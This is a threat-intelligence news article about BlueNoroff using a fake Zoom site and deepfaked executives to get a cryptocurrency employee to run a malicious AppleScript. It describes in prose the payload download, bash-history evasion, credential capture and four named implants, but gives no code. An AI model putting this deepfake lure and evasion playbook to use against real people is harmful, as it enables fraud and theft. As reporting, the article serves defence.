BlueNoroff Deepfake Zoom Scam Targets Cryptocurrency Employee with Malware Attack

Date: June 19, 2025
Author: Ravie Lakshmanan
Category: Threat Intelligence / Malware

In a sophisticated cyber attack, the North Korean-affiliated threat group known as BlueNoroff has exploited deepfake technology to target an employee within the cryptocurrency sector. This incident, reported by cybersecurity firm Huntress, reveals a troubling trend of using artificial intelligence to enhance social engineering tactics aimed at infiltrating corporate environments.

The Attack Unfolds

Huntress detailed the attack on an unidentified employee from a cryptocurrency foundation, who was contacted through Telegram by a seemingly legitimate external party. The attacker made a request to discuss a business matter and shared a Calendly link to schedule a meeting.

However, the Calendly link led the employee to a fake Zoom website controlled by the attackers. Eventually, the employee participated in a group Zoom meeting featuring deepfakes of well-known senior leaders from their company, heightening the credibility of the ruse.

During the meeting, when the employee mentioned difficulties using their microphone, the deepfake personas urged them to download a Zoom extension meant to resolve the issue. This extension, shared via Telegram, was actually an AppleScript with the name "zoom_sdk_support.scpt."

Malware Installation

Once executed, the AppleScript performed several covert actions. While it initially displayed a legitimate webpage for Zoom’s software development kit (SDK), it simultaneously downloaded and executed a secondary payload from a remote server. This series of actions included disabling bash history logging to evade detection, checking for installed software needed to operate on the compromised Mac, and installing additional malware components.

The script further created an invisible file to store user credentials and downloaded various malicious binaries, which included:

• Root Troy V4: A Go-based backdoor enabling remote command execution.
• InjectWithDyld: A binary loader that drops additional payloads on the host system.
• XScreen: An Objective-C keylogger designed to capture keystrokes, clipboard data, and screen activity.
• CryptoBot: A data stealer targeting cryptocurrency-related files.

A Broader Threat Landscape

BlueNoroff, also referred to as APT38, has a notorious history of targeting financial institutions and cryptocurrency businesses to generate revenue for the Democratic People’s Republic of Korea (DPRK). The group’s schemes, including the infamous "TraderTraitor" cryptocurrency heists, have increasingly relied on social engineering tactics to exploit gaps in remote working setups.

Huntress emphasized the vulnerability of remote workers in high-risk industries, particularly those engaged in sectors like cryptocurrency and blockchain technology. They cautioned that training employees to identify potential attacks—especially those relying on social engineering through remote meeting platforms—is crucial in safeguarding sensitive corporate environments.

Conclusion

This attack underscores the evolving methods of cybercriminals, who are increasingly integrating advanced technologies such as deepfake and artificial intelligence into their operations. As threat landscapes continue to expand, particularly concerning remote work, it is imperative for organizations to adopt robust security training and protocols to mitigate risks.

As these incidents reveal the sophistication of cyber threats, it becomes crucial for organizations, especially within the financial and cryptocurrency sectors, to remain vigilant and proactive in their cybersecurity measures.